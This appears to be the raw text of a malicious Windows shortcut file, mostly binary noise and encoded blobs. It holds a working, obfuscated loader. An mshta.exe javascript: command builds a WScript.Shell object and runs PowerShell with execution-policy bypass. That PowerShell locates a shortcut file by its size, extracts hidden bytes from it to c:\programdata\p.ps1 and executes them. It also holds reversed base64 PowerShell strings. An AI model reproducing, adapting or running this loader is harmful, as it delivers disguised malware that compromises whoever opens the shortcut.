Windows
System32
mshta.exe
C:\Windows\System32\mshta.exe
TYdEv.B
Gfo 1u
>$kmno="R3RGJ7kiMrkGJgwiZkgiMzQnbJ9GV6oTXyVGdyVmdu92Y0lmYb1jblxEa0FGU3RGJ70VMrkGJbZGJ9cWYsZGJ70VakslZk0jcvhlYksXKlpXaTZGJgQHbtASakgSZslGa3ByOvRSPpRyO05WdvNmLmRCI9ASZ6l2UmRCI7UGd5JEIn5Wak92YuVULg0GJgM2Zg0DImRyOnEzcw5CccxVY0FGZtFmcn9mcwxFX6M2Jg0WZ0lULlZ3btVmU";$wyc71=$kmno.ToCharArray();[array]::Reverse($wyc71);$qsu= -join($wyc71);$mqwb="rAHJgsTKuVGThRXYEdHZkAyKg4WZMhGdhB1dkRyKgkmZkAyKgkGJoACds1CIwRCI7kmZksSak0Dck0Fdul2WoI3bmtXKwASZu1CIy9GWiRCKml2O9tTZ15Wa052bjtjblxUY0FGR3RGJr4WZMhGdhB1dkRyKpZGJrkGJ9kGJ7liMgEXZtAyZhxmZkgiZpByOwETPpZGJ7kiNrkGJgwiZkgiMzQnbJ9GV6oTXyVGdyVmdu92Y0lmYb1jblxUY0FG";$dmn80=$mqwb.ToCharArray();[array]::Reverse($dmn80);$iov= -join($dmn80);$suwz="ZkgSXdtVZ0lnYbhCIoRXYwRCIjNHI7kSXpITLuVGToRXYQdHZksSamRyKpRCKu4SKpZGJrkGJoslZkgyZulmc0NFdldkLJl0QTFkO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTtFI9ACa0FGcksTXpETLuVGToRXYQdHZksSamRyKpRCKu4SKpZGJrkGJoslZkASPggXZIhGdhBHJd11WlRXeit1O91ncvhlYkAicvhnYtASXwRyWmRCI9ASXwRyWmRCI7lyK";$mqu61=$suwz.ToCharArray();[array]::Reverse($mqu61);$cgj= -join($mqu61);$kqxg="9tjblxUY
r+Mac~vcp|upepMC %(%?gsb
itz`!,33+vy{z%,3eptcR?eaxcrBF1,1yb1etB+33wtfydxtsdg
zb}33,htgrg+eit_1t|dbtC1c~ccT1
^+33yd"y(11wxtbdx1wydxtxb|33,ubgr3+~a`!,becCtgtcbt9vy{z%8+itz`!1,1itz`!171~a`!+ghrt',3p|33:33|~r<1bbp33:33ahs1at<1}}tyb33:33ctf~33:33a331,1wurfts+33wtydfxydxtz{b|33,s{i|+833}}33:33tyB?eax33:33crBF339ert{s^t3+|cf',becCtgtcbt9ghrt'8+itz`!1,1itz`!171|cf'+x~ft',31=wurfts1
dC?yb+33*u51
~x33:33bbtc33:33aiT<tz~33:33g
~33:33R<etV1,1u5*6a|e?)$#\iMMpepU|pcv~cAMM+R6,
3+y{z#,becCtgtcbt9x~ft'8+itz`!1,1itz`!171y{z#+~acd",3+tb}pw1=!3+puv&,becCtgtcbt9~acd"8+itz`!1,1itz`!171puv&++Titrdet1itz`!@
02/'2!-$!4!
ruxn4-0@d%&')}b
b{d47!rv}d%&')n
22!9hi{
%6%23%hd47!rvi{d+.1}`m*/).hd47!rvi{d/39%}b
,ur"+u
!*ur#qq
4b{d#%&vx}d/39%n
22!9hi{
%6%23%hd#%&vxi{d,3!}`m*/).hd#%&vxi{d+.14}b
r$,ur"+(
!*ur#qq
b{d*/5rx}d+.14n
22!9hi{
%6%23%hd*/5rxi{d7!%}`m*/).hd*/5rxi{d/79:}b/
$+')#,
q9$,ub{d'()pr}d/79:n
22!9hi{
%6%23%hd'()pri{d!#%}`m*/).hd'()pri{d369#}bp7
.#,$s"7
!p$-",8+
b{d8%,yp}d369#n
22!9hi{
%6%23%hd8%,ypi{d)-2}`m*/).hd8%,ypi{d79:!}b}}
b{d(+.rv}d79:!n
22!9hi{
%6%23%hd(+.rvi{d#%'}`m*/).hd(+.rvi{d7!%*}d+.1kd,3!kd7!%kd!#%kd)-2kd#%'{d"94%3`}`
/.6%24
42).'hd7!%*i{d2%3`}`m*/).`hd"94%3`m!3`
.6/+%m
802%33)/.`d2%3{
x!Gkit|izv
zozG#"*)/5ovk
vozr#&99!vutj-&9sh;o~H!99/(#";ulrt~r99&colbj!ynH;
u^!99|}
i|~h}99&qr}tqr~tqlrt
!2izODk3-./()uyurqrH;ynH!99}~h~uxvn99&
!oc~U;~vnh~I;itii^;uT9!omb.&hoiI~m~ih~3vutj-2!vozr#;&;vozr#;=;omb.!~spk/&9?;
uzv99099vtx6;hhz99099kby;k~6;ww~sh99099i~lt99099k99;&;
vxDltk!99y|s#s",(b)";}r~th99&yqcv!299ww99099~sH5okr99099ixHL993ox~qyT~oz~iX5okrixHL;&;9!b
p-&hoiI~m~ih~3~spk/2!vozr#;&;vozr#;=;b
p-!b}sr-&9099i~ltk99;&;
vxDltk!~nio;7+;7
vxDltk;unI5sh!99
?;utr99099hh~i99099kc^6~pt99099muR; u}?;ou~out99099X6o~\;&;
? <kvo5",-HcGGzoz_vzi|tiKGG!X<&u}9!vuk)&hoiI~m~ih~3b}sr-2!vozr#;&;vozr#;=;vuk)!hnlz.&9+;7
vxDltk;unI5sh!99 ~?;utrhh~99099ikc^6~ptm99099uR; u}?;ou~ou99099tX6o~\;&;~? <oz
5akvoGGzoz_vzi|tiKGG!X<&u}?;
u99099zvvtx6;hhz99099kby;k~6;ww~sh999!|qt+&hoiI~m~ih~3hnlz.2!vozr#;&;vozr#;=;|qt+!cxrt+&9099|tiKGG!X993~wr]~o~w~_5~mxrvh!299ox~qyTv~99099ohbH~wr]5|urok99099rixH993ox~qyT~oz~iX;&;~mxrvh;o~H!2+++)3k~~wH5okrixHL!99}~tkhpwtkvzlobj99&bnn!~hwz};79!~|s)&hoiI~m~ih~3cxrt+2!vozr#;&;vozr#;=;~|s)!pvuk+&9!299oz
5akvoGGzoz_vzi999!hmb*&hoiI~m~ih~3pvuk+2!vozr#;&;vozr#;=;hmb*!!^c~xno~;vozr#d
SYFKD9V\QPIVT]\IRPWUW?
WYFFFDYD
^FFD\]V\]WTD
KDFFFF
JPVU]\88
488^'D
TYFOFF
KD>7;#!6D
KDFFFF
781'/,FFFFD
KDFFFF
JP]PU688
488^'D
FFOFFKKD
FFOFF'I
488^'CY
488^'FFL
'DYD+7"
7^MTTTVL
PYF^MFF
?48#HLIBJU
&Windows
System32
%mshta.exe
javascript:q=";)(esolc;)0,0,c(nuR.a;)'llehS.tpircSW'(tcejbOXev"+"itcA wen=a";w=q.split('').reverse().join('');b="-Object";d="$m=Get-C"+"hildItem ";e="*.lnk | where"+b+"{$_.length -eq $t}";f="select";g=" -Encoding Byte;";c="p"+"ower"+"shell -ep by"+"pass -c $o=0x1528;$t=0x2f49;"+d+e+" | "+f+b+" -Expa"+"ndProperty Name;if($m.count -eq 0){"+d+"$env:T"+"EMP\\*\\"+e+";};$f=gc $m"+g+"$w='c:\\pro"+"gramdata\\p.ps1';sc $w ([byte[]]($f | "+f+" -Skip 0x0f22 | "+f+" -SkipLast ($t-0x1528)))"+g+". $w";eval(w);
C:\Windows\System32\mshta.exe